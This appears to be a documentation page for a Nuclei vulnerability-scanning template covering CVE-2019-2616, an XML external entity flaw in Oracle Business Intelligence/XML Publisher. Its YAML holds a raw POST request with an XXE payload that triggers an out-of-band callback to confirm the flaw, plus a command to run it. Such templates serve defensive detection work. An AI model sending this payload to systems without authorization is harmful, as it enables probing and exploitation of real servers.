Skip to content
Nuclei Templates

Oracle Business Intelligence/XML Publisher - XML External Entity Injection

ID: CVE-2019-2616

Severity: high

Author: pdteam

Tags: cve,cve2019,oracle,xxe,oast,kev,edb

Description

Section titled “Description”

Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack.

YAML Source

Section titled “YAML Source”
id: CVE-2019-2616


info:
  name: Oracle Business Intelligence/XML Publisher - XML External Entity Injection
  author: pdteam
  severity: high
  description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/46729
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2019-2616
    epss-score: 0.94801
    epss-percentile: 0.99268
    cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: business_intelligence_publisher
  tags: cve,cve2019,oracle,xxe,oast,kev,edb


http:
  - raw:
      - |
        POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Content-Type: text/xml; charset=UTF-8


        <!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://{{interactsh-url}}">


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100b905683d0990a6ca73c4075c4fddfa131ff7463671f420c18a6c3aabde49e0aa022018e1911166010f0e523b05894c1abe0dc594917074392cffb2f27cf6dcd4b3b6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-2616.yaml"

View on Github